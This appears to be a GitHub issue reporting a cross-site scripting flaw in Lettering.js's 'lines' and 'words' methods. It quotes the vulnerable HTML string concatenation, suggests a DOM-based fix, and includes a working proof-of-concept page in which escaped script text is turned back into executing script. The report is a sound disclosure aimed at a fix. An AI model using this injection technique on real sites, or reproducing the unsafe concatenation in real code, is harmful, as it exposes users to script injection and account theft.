Security issue: XSS for methods 'lines' and 'words'

[pcworld]

The injector first extracts the DOM text representation, then inserts it into HTML:

Lettering.js/jquery.lettering.js

Line 20 in d06bb73

inject += '<span class="'+klass+(i+1)+'" aria-hidden="true">'+item+'</span>'+after;

Thus even when the server properly escapes user input, calling lettering on these DOM nodes converts it back to HTML, allowing for cross-site-scripting (XSS).
This is probably only exploitable in the "lines" and "words" methods, because the default method splits into characters, and the < in <span><</span> is parsed as text by browsers.

Solution

Create the <span> programmatically using document.createElement and set the content using textContent.

Exploit

<!doctype html>
<html>
<head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js"></script>
<script src="./jquery.lettering.js"></script>
</head>
<body>
<div id="exploitme">&lt;script&gt;alert(&quot;I'm properly escaped HTML&quot;);&lt;/script&gt;</div>
<script>
jQuery('#exploitme').lettering('lines');
</script>
</body>
</html>

A popup showing "I'm properly escaped HTML" will open, thus arbitrary code execution is achieved. Tested in Firefox 75.0 and Chromium 81.0.4044.113.